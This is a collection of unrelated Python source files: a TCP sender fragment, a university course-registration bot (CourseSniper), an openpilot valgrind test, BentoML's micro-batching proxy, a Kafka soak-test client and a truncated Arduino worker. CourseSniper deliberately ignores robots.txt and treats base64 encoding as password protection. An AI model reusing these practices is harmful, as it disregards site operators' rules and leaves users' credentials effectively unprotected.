Send a message to the socket's outputstream
If the connection drop, the plane can buffer
the messages and resend them once the connection
is up again.
"""
try:
if not self.connected and retry:
self.message_buffer.append(message)
print "Server not connected yet. Buffering %s [total : %d]" % (message, len(self.message_buffer))
else:
self.s.send(message + "\n")
except socket.error, err:
if retry:
self.message_buffer.append(message)
print "Server not connected. Buffering message [total : %d]" % len(self.message_buffer)
if not self.reconnecting:
print "Process reconnection..."
self.connected = False
Thread(target=self.connect, args = ()).start()
if __name__=='__main__':
TCPSender().send()
|
CourseSniper.py | import sys, time, mechanize, getpass, multiprocessing, os, urllib2, base64
# Program name - CourseSniper.py
# Written by - Mohammed Madhi Davoodi (mdavoodi@vt.edu)
# Date and version No: 24/04/2012 Ver 1.2
# CourseSniper is a script written using mechanize which automates the process of
# checking for and adding classes in HokieSpa. The user specifies a CRN and CourseSniper
# will check and see if the class is open. If the class is open it will add the class(
# Make sure you have ran Setup first to setup your login credential's!).
# Features:
# - Adding classes by CRN.
# - CourseSniper supports checking for multiple classes at once using multiprocessing.
# - Will show current processes running in the jobs list.
# - Logs the results of all operations in Logs.
# Clears the screen based on the OS. Does not work in Eclipse.
def cls():
os.system('cls' if os.name=='nt' else 'clear')
# Prints all the current tasks running.
def jobs():
tasks = multiprocessing.active_children()
if len(tasks) == 0:
print "No jobs currently running"
else:
for line in tasks:
print line
raw_input("Press ENTER to continue...")
def dropAdd(crnToDrop, crnToAdd):
global messages # Give us access to messages which stores the log.
# Start browser.
br = mechanize.Browser();
# Allow access to site even if robots are disabled(may be unethical).
br.set_handle_robots(False)
br.set_handle_equiv(False)
# Allow redirects.
br.set_handle_redirect(True)
# Attempt to got to login page.
try:
br.open("https://banweb.banner.vt.edu/ssb/prod/twbkwbis.P_WWWLogin")
br.follow_link(text="Login to HokieSpa >>>", nr = 0)
br.select_form(nr = 0)
br["username"] = username;
# Decode the password.
br["password"] = base64.standard_b64decode(password);
# Submit the page(login).
br.submit()
# Open the registration page.
br.open("https://banweb.banner.vt.edu/ssb/prod/hzskstat.P_DispRegStatPage");
# If the login failed this code wont work.
except:
messages.append("Login failed.")
dropAdd(crnToDrop, crnToAdd)
# Look for the link called Drop/Add. Pick the 5th one(VT's sites are designed badly. No unique ID).
br.follow_link(text="Drop/Add", nr = 0)
br.select_form(nr = 1)
index = 0;
found = False
for control in br.controls:
if (control.value == crnToDrop):
found = True
break
else:
index = index + 1
if (found == True):
control = br.find_control(nr = index - 2)
control.readonly = False
control.value = ["DW"]
# Select control for adding class.
control = br.find_control(id = "crn_id1")
# Enable editing in the box.
control.readonly = False;
# Set the value of the box.
control._value = crnToAdd
response = br.submit()
string = response.get_data()
if "Registration Errors" in string:
return False
else:
return True
else:
return False
def ReplaceClass(crnToDrop, crnToAdd):
global messages
campCRN(crnToAdd)
result = dropAdd(crnToDrop, crnToAdd)
if(result == False):
result = addClass(crnToDrop)
if(result == False):
messages.append("Failed to substitute class " + crnToDrop + " for " + crnToAdd + " readd failed...")
else:
messages.append("Failed to substitute class " + crnToDrop + " for " + crnToAdd + " readd succeeded!")
else:
messages.append("Class substitute of " + crnToDrop + " for " + crnToAdd + " succeeded!")
# Adds the class specified by the crn field.
# @param crn: The crn of the class to add.
# @return: True if the class was added. False if there was an error.
def addClass(crn):
global messages # Give us access to messages which stores the log.
# Start browser.
br = mechanize.Browser();
# Allow access to site even if robots are disabled(may be unethical).
br.set_handle_robots(False)
br.set_handle_equiv(False)
# Allow redirects.
br.set_handle_redirect(True)
# Attempt to got to login page.
try:
br.open("https://banweb.banner.vt.edu/ssb/prod/twbkwbis.P_WWWLogin")
br.follow_link(text="Login to HokieSpa >>>", nr = 0)
br.select_form(nr = 0)
br["username"] = username;
# Decode the password.
br["password"] = base64.standard_b64decode(password);
# Submit the page(login).
br.submit()
# Open the registration page.
br.open("https://banweb.banner.vt.edu/ssb/prod/hzskstat.P_DispRegStatPage");
# If the login failed this code wont work.
except:
messages.append("Login failed.")
addClass(crn)
try:
# Look for the link called Drop/Add. Pick the Nth one(VT's sites are designed badly. No unique ID).
br.follow_link(text="Drop/Add", nr = 0)
br.select_form(nr = 1)
control = br.find_control(id = "crn_id1")
# Enable editing in the box.
control.readonly = False;
# Set the value of the box.
control._value = crn
response = br.submit()
string = response.get_data()
if "Registration Errors" in string:
return False
else:
return True
except:
addClass(crn)
return False
# Terminates all the running processes
def terminate():
for process in processes:
if (process.is_alive()):
process.terminate()
sys.exit()
def addClassByCRN(crn, messages):
campCRN(crn)
# Class was found, add it.
result = addClass(crn)
if(result == True):
messages.extend([crn + " successfully added."])
else:
messages.extend([crn + " failed to add."])
# Checks to see if the specified crn is open.
# @param crn: The crn of the course we are checking to see is open
# @param messages: the log file for the call.
def campCRN(crn):
global messages
br = mechanize.Browser();
br.set_handle_robots(False);
br.set_handle_equiv(False)
# Load the Timetable.
try:
br.open("https://banweb.banner.vt.edu/ssb/prod/HZSKVTSC.P_ProcRequest");
except:
campCRN(crn)
found = False
# Loop until the class is open.
while(found != True):
try:
br.select_form(nr = 0);
br["open_only"] = ["on"]
br["TERMYEAR"] = ["201401"]
br["crn"] = crn;
string = ""
# Try except to be used to try and catch all HTTP errors.
response = br.submit()
string = response.get_data()
except urllib2.HTTPError, e:
messages.extend([crn + " got HTTP " +str(e.code) + " error."])
continue
if "NO SECTIONS FOUND FOR THIS INQUIRY." in string:
found = False
time.sleep(30)
else:
found = True
# Set's up account to be used to add the class.
def setup():
global username
username = raw_input("Enter your PID: ")
global password
password = base64.standard_b64encode(getpass.getpass("Enter your password: "))
confirm = base64.standard_b64encode(getpass.getpass("Confirm your password: "))
if(password == confirm):
print 'Setup Successful'
else:
print "Password did not match."
setup()
raw_input("Press ENTER to continue...")
# Prints the log.
def log():
global messages
if len(messages) == 0:
print "Nothing Added yet"
else:
for line in messages:
print line
raw_input("Press ENTER to continue...")
# Brings up the main screen.
def main():
global messages, processes
print "Welcome to CourseSniper 1.2"
print "What would you like to do?"
print "1. Add class by CRN"
print "2. Replace Class by CRN"
print "3. Log"
print "4. Jobs"
print "5. Setup"
print "6. Exit"
var = raw_input("Input the command you want to do's number: ")
if (var == "1"):
cls()
CRN = raw_input("Enter the CRN of the class you want to add: ")
service = multiprocessing.Process(name='addClassByCRN_' + CRN, target=addClassByCRN, args=(CRN, messages))
service.start()
processes.append(service)
print "CRN added to jobs list."
raw_input("Press ENTER to continue...")
cls()
main()
elif (var == "2"):
cls()
crnToDrop = raw_input("Enter the CRN of the class you want to drop: ")
crnToAdd = raw_input("Enter the CRN of the class you want to add: ")
service = multiprocessing.Process(name='ReplaceClassByCRN_' + crnToDrop + '_with_' + crnToAdd ,
target=ReplaceClass, args=(crnToDrop, crnToAdd))
service.start()
processes.append(service)
print "Replace added to jobs list."
raw_input("Press ENTER to continue...")
cls()
main()
elif (var == '3'):
cls()
log()
cls()
main()
elif (var == '4') :
cls()
jobs()
cls()
main()
elif (var == "5"):
cls()
setup()
cls()
main()
elif (var == "6"):
terminate()
else:
print 'Invalid Input.'
time.sleep(1)
cls()
main()
if __name__ == '__main__':
# List of all processes ever ran.
processes = []
# Manager to use to manage all the process's
manager = multiprocessing.Manager()
# Default username
username = ''
# Default password
password = ''
# Set up a list using manager that all processes can have access too.
messages = manager.list()
main()
|
test_valgrind_replay.py | import os
import threading
import time
import unittest
import subprocess
import signal
if "CI" in os.environ:
def tqdm(x):
return x
else:
from tqdm import tqdm # type: ignore
import cereal.messaging as messaging
from collections import namedtuple
from tools.lib.logreader import LogReader
from selfdrive.test.process_replay.test_processes import get_segment
from common.basedir import BASEDIR
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'command', 'path', 'segment', 'wait_for_response'])
CONFIGS = [
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=[],
command="./ubloxd",
path="selfdrive/locationd/",
segment="0375fdf7b1ce594d|2019-06-13--08-32-25--3",
wait_for_response=True
),
]
class TestValgrind(unittest.TestCase):
def extract_leak_sizes(self, log):
log = log.replace(",","") # fixes casting to int issue with large leaks
err_lost1 = log.split("definitely lost: ")[1]
err_lost2 = log.split("indirectly lost: ")[1]
err_lost3 = log.split("possibly lost: ")[1]
definitely_lost = int(err_lost1.split(" ")[0])
indirectly_lost = int(err_lost2.split(" ")[0])
possibly_lost = int(err_lost3.split(" ")[0])
return (definitely_lost, indirectly_lost, possibly_lost)
def valgrindlauncher(self, arg, cwd):
os.chdir(os.path.join(BASEDIR, cwd))
# Run valgrind on a process
command = "valgrind --leak-check=full " + arg
p = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid) # pylint: disable=W1509
while not self.done:
time.sleep(0.1)
os.killpg(os.getpgid(p.pid), signal.SIGINT)
_, err = p.communicate()
error_msg = str(err, encoding='utf-8')
with open(os.path.join(BASEDIR, "selfdrive/test/valgrind_logs.txt"), "a") as f:
f.write(error_msg)
f.write(5 * "\n")
definitely_lost, indirectly_lost, possibly_lost = self.extract_leak_sizes(error_msg)
if max(definitely_lost, indirectly_lost, possibly_lost) > 0:
self.leak = True
print("LEAKS from", arg, "\nDefinitely lost:", definitely_lost, "\nIndirectly lost", indirectly_lost, "\nPossibly lost", possibly_lost)
else:
self.leak = False
def replay_process(self, config, logreader):
pub_sockets = [s for s in config.pub_sub.keys()] # We dump data from logs here
sub_sockets = [s for _, sub in config.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(pub_sockets)
sm = messaging.SubMaster(sub_sockets)
print("Sorting logs")
all_msgs = sorted(logreader, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(config.pub_sub.keys())]
thread = threading.Thread(target=self.valgrindlauncher, args=(config.command, config.path))
thread.daemon = True
thread.start()
time.sleep(5) # We give the process time to start
for msg in tqdm(pub_msgs):
pm.send(msg.which(), msg.as_builder())
if config.wait_for_response:
sm.update(100)
self.done = True
def test_config(self):
open(os.path.join(BASEDIR, "selfdrive/test/valgrind_logs.txt"), "w")
for cfg in CONFIGS:
self.done = False
URL = cfg.segment
lr = LogReader(get_segment(URL))
self.replay_process(cfg, lr)
time.sleep(1) # Wait for the logs to get written
if __name__ == "__main__":
unittest.main()
|
marshal.py | # Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import logging
import multiprocessing
import time
import traceback
from functools import partial
import aiohttp
import psutil
from bentoml import config
from bentoml.exceptions import RemoteException
from bentoml.marshal.dispatcher import CorkDispatcher, NonBlockSema
from bentoml.marshal.utils import DataLoader
from bentoml.saved_bundle import load_bento_service_metadata
from bentoml.server.trace import async_trace, make_http_headers
from bentoml.types import HTTPRequest, HTTPResponse
logger = logging.getLogger(__name__)
ZIPKIN_API_URL = config("tracing").get("zipkin_api_url")
def metrics_patch(cls):
class _MarshalService(cls):
def __init__(self, *args, **kwargs):
from prometheus_client import Histogram, Counter, Gauge
super(_MarshalService, self).__init__(*args, **kwargs)
namespace = config('instrument').get(
'default_namespace'
) # its own namespace?
service_name = self.bento_service_metadata_pb.name
self.metrics_request_batch_size = Histogram(
name=service_name + '_mb_batch_size',
documentation=service_name + "microbatch request batch size",
namespace=namespace,
labelnames=['endpoint'],
)
self.metrics_request_duration = Histogram(
name=service_name + '_mb_requestmb_duration_seconds',
documentation=service_name + "API HTTP request duration in seconds",
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
self.metrics_request_in_progress = Gauge(
name=service_name + "_mb_request_in_progress",
documentation='Total number of HTTP requests in progress now',
namespace=namespace,
labelnames=['endpoint', 'http_method'],
)
self.metrics_request_exception = Counter(
name=service_name + "_mb_request_exception",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'exception_class'],
)
self.metrics_request_total = Counter(
name=service_name + "_mb_request_total",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
async def request_dispatcher(self, request):
func = super(_MarshalService, self).request_dispatcher
api_name = request.match_info.get("name", "/")
_metrics_request_in_progress = self.metrics_request_in_progress.labels(
endpoint=api_name, http_method=request.method,
)
_metrics_request_in_progress.inc()
time_st = time.time()
try:
resp = await func(request)
except Exception as e: # pylint: disable=broad-except
self.metrics_request_exception.labels(
endpoint=api_name, exception_class=e.__class__.__name__
).inc()
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(status=500)
self.metrics_request_total.labels(
endpoint=api_name, http_response_code=resp.status
).inc()
self.metrics_request_duration.labels(
endpoint=api_name, http_response_code=resp.status
).observe(time.time() - time_st)
_metrics_request_in_progress.dec()
return resp
async def _batch_handler_template(self, requests, api_name):
func = super(_MarshalService, self)._batch_handler_template
self.metrics_request_batch_size.labels(endpoint=api_name).observe(
len(requests)
)
return await func(requests, api_name)
return _MarshalService
@metrics_patch
class MarshalService:
"""
MarshalService creates a reverse proxy server in front of actual API server,
implementing the micro batching feature.
It wait a short period and packed multiple requests in a single batch
before sending to the API server.
It applied an optimized CORK algorithm to get best efficiency.
"""
_MARSHAL_FLAG = config("marshal_server").get("marshal_request_header_flag")
_DEFAULT_PORT = config("apiserver").getint("default_port")
DEFAULT_MAX_LATENCY = config("marshal_server").getint("default_max_latency")
DEFAULT_MAX_BATCH_SIZE = config("marshal_server").getint("default_max_batch_size")
def __init__(
self,
bento_bundle_path,
outbound_host="localhost",
outbound_port=None,
outbound_workers=1,
):
self.outbound_host = outbound_host
self.outbound_port = outbound_port
self.outbound_workers = outbound_workers
self.batch_handlers = dict()
self._outbound_sema = None # the semaphore to limit outbound connections
self.bento_service_metadata_pb = load_bento_service_metadata(bento_bundle_path)
self.setup_routes_from_pb(self.bento_service_metadata_pb)
if psutil.POSIX:
import resource
self.CONNECTION_LIMIT = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
self.CONNECTION_LIMIT = 1024
logger.info(
"Your system nofile limit is %d, which means each instance of microbatch "
"service is able to hold this number of connections at same time. "
"You can increase the number of file descriptors for the server process, "
"or launch more microbatch instances to accept more concurrent connection.",
self.CONNECTION_LIMIT,
)
def set_outbound_port(self, outbound_port):
self.outbound_port = outbound_port
def fetch_sema(self):
if self._outbound_sema is None:
self._outbound_sema = NonBlockSema(self.outbound_workers)
return self._outbound_sema
def add_batch_handler(self, api_name, max_latency, max_batch_size):
'''
Params:
* max_latency: limit the max latency of overall request handling
* max_batch_size: limit the max batch size for handler
** marshal server will give priority to meet these limits than efficiency
'''
if api_name not in self.batch_handlers:
_func = CorkDispatcher(
max_latency,
max_batch_size,
shared_sema=self.fetch_sema(),
fallback=aiohttp.web.HTTPTooManyRequests,
)(partial(self._batch_handler_template, api_name=api_name))
self.batch_handlers[api_name] = _func
def setup_routes_from_pb(self, bento_service_metadata_pb):
from bentoml.adapters import BATCH_MODE_SUPPORTED_INPUT_TYPES
for api_pb in bento_service_metadata_pb.apis:
if api_pb.input_type in BATCH_MODE_SUPPORTED_INPUT_TYPES:
max_latency = api_pb.mb_max_latency or self.DEFAULT_MAX_LATENCY
max_batch_size = api_pb.mb_max_batch_size or self.DEFAULT_MAX_BATCH_SIZE
self.add_batch_handler(api_pb.name, max_latency, max_batch_size)
logger.info("Micro batch enabled for API `%s`", api_pb.name)
async def request_dispatcher(self, request):
with async_trace(
ZIPKIN_API_URL,
service_name=self.__class__.__name__,
span_name="[1]http request",
is_root=True,
standalone=True,
sample_rate=0.001,
):
api_name = request.match_info.get("name")
if api_name in self.batch_handlers:
req = HTTPRequest(
tuple((k.decode(), v.decode()) for k, v in request.raw_headers),
await request.read(),
)
try:
resp = await self.batch_handlers[api_name](req)
except RemoteException as e:
# known remote exception
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(
status=e.payload.status,
headers=e.payload.headers,
body=e.payload.body,
)
except Exception: # pylint: disable=broad-except
logger.error(traceback.format_exc())
resp = aiohttp.web.HTTPInternalServerError()
else:
resp = await self.relay_handler(request)
return resp
async def relay_handler(self, request):
data = await request.read()
headers = dict(request.headers)
url = request.url.with_host(self.outbound_host).with_port(self.outbound_port)
with async_trace(
ZIPKIN_API_URL,
service_name=self.__class__.__name__,
span_name=f"[2]{url.path} relay",
) as trace_ctx:
headers.update(make_http_headers(trace_ctx))
async with aiohttp.ClientSession() as client:
async with client.request(
request.method, url, data=data, headers=request.headers
) as resp:
body = await resp.read()
return aiohttp.web.Response(
status=resp.status, body=body, headers=resp.headers,
)
async def _batch_handler_template(self, requests, api_name):
'''
batch request handler
params:
* requests: list of aiohttp request
* api_name: called API name
raise:
* RemoteException: known exceptions from model server
* Exception: other exceptions
'''
headers = {self._MARSHAL_FLAG: "true"}
api_url = f"http://{self.outbound_host}:{self.outbound_port}/{api_name}"
with async_trace(
ZIPKIN_API_URL,
service_name=self.__class__.__name__,
span_name=f"[2]merged {api_name}",
) as trace_ctx:
headers.update(make_http_headers(trace_ctx))
reqs_s = DataLoader.merge_requests(requests)
try:
async with aiohttp.ClientSession() as client:
async with client.post(
api_url, data=reqs_s, headers=headers
) as resp:
raw = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError as e:
raise RemoteException(
e, payload=HTTPResponse(status=503, body=b"Service Unavailable")
)
if resp.status != 200:
raise RemoteException(
f"Bad response status from model server:\n{resp.status}\n{raw}",
payload=HTTPResponse(
status=resp.status,
headers=tuple(resp.headers.items()),
body=raw,
),
)
merged = DataLoader.split_responses(raw)
return tuple(
aiohttp.web.Response(body=i.body, headers=i.headers, status=i.status)
for i in merged
)
def async_start(self, port):
"""
Start an micro batch server at the specific port on the instance or parameter.
"""
marshal_proc = multiprocessing.Process(
target=self.fork_start_app, kwargs=dict(port=port), daemon=True,
)
marshal_proc.start()
logger.info("Running micro batch service on :%d", port)
def make_app(self):
app = aiohttp.web.Application()
app.router.add_view("/", self.relay_handler)
app.router.add_view("/{name}", self.request_dispatcher)
app.router.add_view("/{path:.*}", self.relay_handler)
return app
def fork_start_app(self, port):
# Use new eventloop in the fork process to avoid problems on MacOS
# ref: https://groups.google.com/forum/#!topic/python-tornado/DkXjSNPCzsI
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
app = self.make_app()
aiohttp.web.run_app(app, port=port)
|
soakclient.py | #!/usr/bin/env python
#
# Copyright 2018 Confluent Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Soak test producer-consumer end-to-end client for
# long term validation testing.
#
# Usage:
# tests/soak/soakclient.py -t soaktest.py -r 80 -f <client-conf-file>
#
from confluent_kafka import KafkaError, KafkaException, version
from confluent_kafka import Producer, Consumer
from confluent_kafka.admin import AdminClient, NewTopic
from collections import defaultdict
from builtins import int
import argparse
import threading
import time
import json
import logging
import sys
class SoakRecord (object):
""" A private record type, with JSON serializer and deserializer """
def __init__(self, msgid, name=None):
self.msgid = msgid
if name is None:
self.name = "SoakRecord nr #{}".format(self.msgid)
else:
self.name = name
def serialize(self):
return json.dumps(self, default=lambda o: o.__dict__)
def __str__(self):
return "SoakRecord({})".format(self.name)
@classmethod
def deserialize(cls, binstr):
d = json.loads(binstr)
return SoakRecord(d['msgid'], d['name'])
class SoakClient (object):
""" The SoakClient consists of a Producer sending messages at
the given rate, and a Consumer consuming the messages.
Both clients print their message and error counters every 10 seconds.
"""
def dr_cb(self, err, msg):
""" Producer delivery report callback """
if err is not None:
self.logger.warning("producer: delivery failed: {} [{}]: {}".format(msg.topic(), msg.partition(), err))
self.dr_err_cnt += 1
else:
self.dr_cnt += 1
if (self.dr_cnt % self.disprate) == 0:
self.logger.debug("producer: delivered message to {} [{}] at offset {}".format(
msg.topic(), msg.partition(), msg.offset()))
def produce_record(self):
""" Produce a single record """
record = SoakRecord(self.producer_msgid)
txcnt = 0
while True:
txcnt += 1
try:
self.producer.produce(self.topic, value=record.serialize(),
headers={"msgid": str(record.msgid),
"time": str(time.time()),
"txcnt": str(txcnt)},
on_delivery=self.dr_cb)
break
except BufferError:
self.producer.poll(1)
continue
self.producer_msgid += 1
def producer_stats(self):
""" Print producer stats """
self.logger.info("producer: {} messages produced, {} delivered, {} failed, {} error_cbs".format(
self.producer_msgid, self.dr_cnt, self.dr_err_cnt,
self.producer_error_cb_cnt))
def producer_run(self):
""" Producer main loop """
sleep_intvl = 1.0 / self.rate
self.producer_msgid = 0
self.dr_cnt = 0
self.dr_err_cnt = 0
self.producer_error_cb_cnt = 0
next_stats = time.time() + 10
while self.run:
self.produce_record()
now = time.time()
t_end = now + sleep_intvl
while True:
if now > next_stats:
self.producer_stats()
next_stats = now + 10
remaining_time = t_end - now
if remaining_time < 0:
remaining_time = 0
self.producer.poll(remaining_time)
if remaining_time <= 0:
break
now = time.time()
remaining = self.producer.flush(30)
self.logger.warning("producer: {} message(s) remaining in queue after flush()".format(remaining))
self.producer_stats()
def producer_thread_main(self):
""" Producer thread main function """
try:
self.producer_run()
except KeyboardInterrupt:
self.logger.info("producer: aborted by user")
self.run = False
except Exception as ex:
self.logger.fatal("producer: fatal exception: {}".format(ex))
self.run = False
def consumer_stats(self):
""" Print consumer stats """
self.logger.info("consumer: {} messages consumed, {} duplicates, "
"{} missed, {} message errors, {} consumer errors, {} error_cbs".format(
self.msg_cnt, self.msg_dup_cnt, self.msg_miss_cnt,
self.msg_err_cnt, self.consumer_err_cnt,
self.consumer_error_cb_cnt))
def consumer_run(self):
""" Consumer main loop """
self.consumer_msgid_next = 0
self.consumer.subscribe([self.topic])
self.msg_cnt = 0
self.msg_dup_cnt = 0
self.msg_miss_cnt = 0
self.msg_err_cnt = 0
self.consumer_err_cnt = 0
self.consumer_error_cb_cnt = 0
self.last_commited = None
# Keep track of high-watermarks to make sure we don't go backwards
hwmarks = defaultdict(int)
while self.run:
msg = self.consumer.poll(1)
if msg is None:
continue
if msg.error() is not None:
self.logger.error("consumer: error: {}".format(msg.error()))
self.consumer_err_cnt += 1
continue
try:
record = SoakRecord.deserialize(msg.value()) # noqa unused variable
except ValueError as ex:
self.logger.info("consumer: Failed to deserialize message in "
"{} [{}] at offset {} (headers {}): {}".format(
msg.topic(), msg.partition(), msg.offset(), msg.headers(), ex))
self.msg_err_cnt += 1
self.msg_cnt += 1
if (self.msg_cnt % self.disprate) == 0:
self.logger.info("consumer: {} messages consumed: Message {} "
"[{}] at offset {} (headers {}, latency {})".format(
self.msg_cnt,
msg.topic(), msg.partition(),
msg.offset(), msg.headers(),
time.time() - float(dict(msg.headers())['time'])))
self.consumer_stats()
hwkey = "{}-{}".format(msg.topic(), msg.partition())
hw = hwmarks[hwkey]
if hw > 0:
if msg.offset() <= hw:
self.logger.warning("consumer: Old or duplicate message {} "
"[{}] at offset {} (headers {}): wanted offset > {} (last commited {})".format(
msg.topic(), msg.partition(),
msg.offset(), msg.headers(), hw,
self.last_committed))
self.msg_dup_cnt += (hw + 1) - msg.offset()
elif msg.offset() > hw + 1:
self.logger.warning("consumer: Lost messages, now at {} "
"[{}] at offset {} (headers {}): "
"expected offset {}+1 (last committed {})".format(
msg.topic(), msg.partition(),
msg.offset(), msg.headers(), hw,
self.last_committed))
self.msg_miss_cnt += msg.offset() - (hw + 1)
hwmarks[hwkey] = msg.offset()
self.consumer.close()
self.consumer_stats()
def consumer_thread_main(self):
""" Consumer thread main function """
try:
self.consumer_run()
except KeyboardInterrupt:
self.logger.info("consumer: aborted by user")
self.run = False
except Exception as ex:
self.logger.fatal("consumer: fatal exception: {}".format(ex))
self.run = False
def consumer_error_cb(self, err):
""" Consumer error callback """
self.logger.error("consumer: error_cb: {}".format(err))
self.consumer_error_cb_cnt += 1
def consumer_commit_cb(self, err, partitions):
""" Auto commit result callback """
if err is not None:
self.logger.error("consumer: offset commit failed for {}: {}".format(partitions, err))
self.consumer_err_cnt += 1
else:
self.last_committed = partitions
def producer_error_cb(self, err):
""" Producer error callback """
self.logger.error("producer: error_cb: {}".format(err))
self.producer_error_cb_cnt += 1
def stats_cb(self, json_str):
""" Common statistics callback.
Extracts the number of connected brokers and prints it,
to monitor the sparse connection functionality. """
d = json.loads(json_str)
brokers = d['brokers']
broker_cnt = len(brokers)
up_brokers = [brokers[x]['name'] for x in brokers if brokers[x]['state'] == 'UP']
if self.topic in d['topics']:
leaders = ['{}={}'.format(p['partition'], p['leader'])
for p in d['topics'][self.topic]['partitions'].values() if p['partition'] != -1]
else:
leaders = []
self.logger.info("{} stats: {}/{} brokers UP, {} partition leaders: {}".format(
d['name'], len(up_brokers), broker_cnt, self.topic, leaders))
self.stats_cnt[d['type']] += 1
if (self.stats_cnt[d['type']] % 10) == 0:
self.logger.info("{} raw stats: {}".format(d['name'], json_str))
def create_topic(self, topic, conf):
""" Create the topic if it doesn't already exist """
admin = AdminClient(conf)
fs = admin.create_topics([NewTopic(topic, num_partitions=2, replication_factor=3)])
f = fs[topic]
try:
res = f.result() # noqa unused variable
except KafkaException as ex:
if ex.args[0].code() == KafkaError.TOPIC_ALREADY_EXISTS:
self.logger.info("Topic {} already exists: good".format(topic))
else:
raise
def __init__(self, topic, rate, conf):
""" SoakClient constructor. conf is the client configuration """
self.topic = topic
self.rate = rate
self.disprate = int(rate * 10)
self.run = True
self.stats_cnt = {'producer': 0, 'consumer': 0}
self.start_time = time.time()
self.logger = logging.getLogger('soakclient')
self.logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)-15s %(levelname)-8s %(message)s'))
self.logger.addHandler(handler)
# Create topic (might already exist)
self.create_topic(self.topic, conf)
#
# Create Producer and Consumer, each running in its own thread.
#
conf['stats_cb'] = self.stats_cb
conf['statistics.interval.ms'] = 10000
# Producer
conf['error_cb'] = self.producer_error_cb
self.producer = Producer(conf)
# Consumer
conf['error_cb'] = self.consumer_error_cb
conf['on_commit'] = self.consumer_commit_cb
self.logger.info("consumer: using group.id {}".format(conf['group.id']))
self.consumer = Consumer(conf)
self.producer_thread = threading.Thread(target=self.producer_thread_main)
self.producer_thread.start()
self.consumer_thread = threading.Thread(target=self.consumer_thread_main)
self.consumer_thread.start()
def terminate(self):
""" Terminate Producer and Consumer """
soak.logger.info("Terminating (ran for {}s)".format(time.time() - self.start_time))
self.run = False
self.producer_thread.join()
self.consumer_thread.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Kafka client soak test')
parser.add_argument('-b', dest='brokers', type=str, default=None, help='Bootstrap servers')
parser.add_argument('-t', dest='topic', type=str, required=True, help='Topic to use')
parser.add_argument('-r', dest='rate', type=float, default=10, help='Message produce rate per second')
parser.add_argument('-f', dest='conffile', type=argparse.FileType('r'),
help='Configuration file (configprop=value format)')
args = parser.parse_args()
conf = dict()
if args.conffile is not None:
# Parse client configuration file
for line in args.conffile:
line = line.strip()
if len(line) == 0 or line[0] == '#':
continue
i = line.find('=')
if i <= 0:
raise ValueError("Configuration lines must be `name=value..`, not {}".format(line))
name = line[:i]
value = line[i+1:]
conf[name] = value
if args.brokers is not None:
# Overwrite any brokers specified in configuration file with
# brokers from -b command line argument
conf['bootstrap.servers'] = args.brokers
if 'group.id' not in conf:
# Generate a group.id bound to this client and python version
conf['group.id'] = 'soakclient.py-{}-{}'.format(version()[0], sys.version.split(' ')[0])
# We don't care about partition EOFs
conf['enable.partition.eof'] = False
# Create SoakClient
soak = SoakClient(args.topic, args.rate, conf)
# Run until interrupted
try:
while soak.run:
time.sleep(10)
soak.logger.info("Soak client aborted")
except (KeyboardInterrupt):
soak.logger.info("Interrupted by user")
except Exception as e:
soak.logger.error("Fatal exception {}".format(e))
# Terminate
soak.terminate()
|
arduino_worker.py | import time
import json
import threading
import random
import socket
from nanpy import (SerialManager, ArduinoApi)
from nanpy.serialmanager import SerialManagerError
from nanpy.sockconnection import (SocketManager, SocketManagerError)
from workers.arduino.arduino_control_worker import ArduinoControlWorker
from workers.arduino.arduino_sensor_worker import ArduinoSensorWorker
from workers.arduino.arduino_relay_worker import ArduinoRelayWorker
from .worker import Worker
import sys
import importlib
from logger.Logger import Logger, LOG_LEVEL
# r = redis.Redis(host='127.0.0.1', port=6379)
class ArduinoWorker(Worker):
def __init__(self, config, main_thread_running, system_ready,
connection=None):
super().__init__(config, main_thread_running, system_ready)
self.connection = connection
self.threads = []
# Events
self.node_ready = threading.Event()
self.node_connected = threading.Event() # Event to signal if node can be used
self.workers = []
self.relays = []
self.relayEvents = {}
self.relay_index = 0
if connection is None:
self.connection = self.connect()
try:
if self.config['controls'] is not None:
acw = ArduinoControlWorker(self.config, main_thread_running,
system_ready, self.node_connected,
self.connection)
self.workers.append(acw)
time.sleep(3)
except KeyError:
Logger.log(LOG_LEVEL["info"],
'{name} Node Controls...\t\t\033[1;31m Disabled\033[0;0m'.format(
**self.config))
try:
if self.config['relays'] is not None:
for relay in self.config['relays']:
# Create a threading event for each relay to check status
relayState = {
"available": threading.Event(),
# Event to allow relay to activate
"active": threading.Event()
# Event to signal relay to open/close
}
# Store the relays under the key or index if no key is found, this way we can reference the right relays
self.relayEvents[
relay.get("key", self.relay_index)] = relayState
# Create sensor worker for a relay
arw = ArduinoRelayWorker(relay, main_thread_running,
system_ready,
relayState['available'],
relayState['active'],
